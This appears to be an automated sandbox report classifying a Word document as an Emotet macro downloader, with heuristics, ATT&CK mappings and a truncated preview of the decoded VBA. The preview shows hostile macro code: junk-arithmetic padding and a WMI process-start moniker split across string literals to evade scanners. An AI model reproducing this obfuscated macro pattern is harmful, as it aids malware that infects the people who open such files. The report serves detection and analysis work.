Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing VBA macros. Heuristics indicate both a legacy WordBasic auto-exec marker and VBA macros, with an AutoOpen macro as the trigger. Critically, the macro uses GetObject and CreateObject to launch a process through WMI, with the API names obfuscated by string concatenation (for example, the 'winmgmts' moniker is reassembled from split literals). This strongly suggests downloader functionality, consistent with the Emotet family, which commonly uses such techniques to fetch and execute further stages. The ClamAV detection also confirms this classification.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6861363-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro.
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59706 bytes |

SHA-256: d133fab4ac710a015d89bc6998ed80eab93a99d28ec91c254023b600c4388837

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "R9_45_7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "E031200_"
Function d1_407()
If p_1425 <> I88_9_8_ Then
v68_858 = (428620398)
C7_784 = m5190_4 * 118116226 + u_6_352 + CLng(v70_087_)
F659_137 = 309806566 / Hex(i6128__ / Chr(Z68772 - CDate(36979775)) * 579587310 / 389785967) / w864_8 - Fix(297566378)
B__43410 = (621256709)
End If
If r49280 <> j9___82_ Then
S7_1__ = (63787166)
E2772764 = S8_206_ * 54126198 + C_196_83 + CLng(t1___03)
N8456_86 = 343595708 / Hex(v04_922 / Chr(R_3759 - CDate(293058146)) * 641648967 / 20298651) / M0682_09 - Fix(631564489)
J_293__ = (330770041)
End If
If F1_692 <> R3309_7 Then
Z1__04 = (190120509)
k059684 = w_0998 * 278107319 + q6794_89 + CLng(Y7_07_6)
k_07707_ = 616089774 / Hex(R837683 / Chr(b1_700_ - CDate(259446265)) * 124792873 / 173956409) / r4__3_ - Fix(3957901)
B__04_44 = (289542732)
End If
If f_8265 <> J_434_7 Then
N6_2229 = (372889393)
G94__6__ = s8_3069 * 260236540 + n393__ + CLng(b__030)
u17_7190 = 714359534 / Hex(q7086_1 / Chr(A2____6_ - CDate(705864281)) * 146190079 / 385332804) / z88_9_ - Fix(737269858)
Y26_9_58 = (738950352)
End If
If S_890343 <> C__32_5 Then
a5_1271 = (748951573)
o1_4315 = j84_701 * 943459467 + i___3_08 + CLng(I962_56)
j2_208_5 = 352213361 / Hex(B7_177_ / Chr(S88777_3 - CDate(97952918)) * 229772506 / 178719200) / J99__364 - Fix(587436027)
Y60_60 = (270359717)
End If
If j_26866_ <> V49805 Then
p__618 = (632708159)
a_45349 = z3_8789 * 21463816 + j__025 + CLng(z4_9____)
t4_1526 = 857659617 / Hex(T7__18 / Chr(c23_569 - CDate(937503249)) * 718071240 / 351480477) / b8523420 - Fix(506511051)
N_9777 = (889171548)
End If
If l45_47_3 <> w84459 Then
u97_3_28 = (73691754)
N_9_17__ = O72__311 * 538318571 + B5_65_ + CLng(j_6_56)
m4_5_3 = 82260219 / Hex(U33_28 / Chr(h48_60 - CDate(733073375)) * 894118477 / 519535761) / t9_68_ - Fix(277961741)
c7_453_8 = (889786015)
End If
If D48_833 <> W4____80 Then
u726__1 = (886075633)
Z_798_0 = I2_8_0 * 36658993 + p__15__ + CLng(q9284946)
T6_2_6_8 = 154679561 / Hex(k_29200 / Chr(d_8___3 - CDate(636547383)) * 876471277 / 103535968) / C44____ - Fix(690577965)
j_92_1_ = (168679940)
End If
End Function
Function a50121_5(C__09_9, J39__4_3)
On Error Resume Next
If O8360_0 <> H8873986 Then
E0_120 = (707556898)
a_3_8594 = F2__8_2 * 769617898 + R_7__107 + CLng(l_7_3_)
B286012 = 168869300 / Hex(Q5__979_ / Chr(B792__9 - CDate(155950407)) * 650894411 / 104879468) / p8__5_16 - Fix(624729997)
s233_512 = (387004902)
End If
If i4__6_ <> J_21145 Then
J40131 = (915651260)
B_11_89 = n5_87_6 * 466173657 + j868_9_ + CLng(J74_8__0)
I96_99 = 642186469 / Hex(q_90058_ / Chr(O7_592 - CDate(127668919)) * 499843458 / 297040584) / d2_53_4 - Fix(785442303)
H41618_9 = (657836405)
End If
Set k307_293 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
If q5337354 <> J0_8_3 Then
W___075 = (41173870)
Q___67_1 = L_43320 * 91774371 + J18__8_ + CLng(l_737_3)
R6__0_7 = 606139366 / Hex(o8_4_90 / Chr(H1_0_6 - CDate(771700871)) * 517139692 / 792313149) / P1_4__05 - Fix(336567443)
G1322_9 = (609707731)
End If
If i07_45 <> N14277_ Then
i__3_198 = (391056265)
a08_7_95 = t740__85 * 805785355 + i1089_ + CLng(t3_4_28)
i0_04__ = 444575962 / Hex(L4149_9 / Chr(t5__109 - CDate(705396766)) * 20526299 / 241168612) / L639268 - Fix(339373884)
E3666__4 = (367230923)
End If
k307_293.ShowWindow = 127424 - 127424
If i1_62_ <> z_1__9 Then
M7927758 = (432711541)
h80___5_ = k348638_ * 293469487 + S_52409 + CLng(L_31385_)
i90_8559 = 84098378 / Hex(p2_2505_ / Chr(m_80_1 - CDate(175102189)) * 379666387 / 873539123) / f77_02__ - Fix(935295448)
s16_5__ = (821292268)
End If
If i79_36 <> p6150002 Then
... (truncated)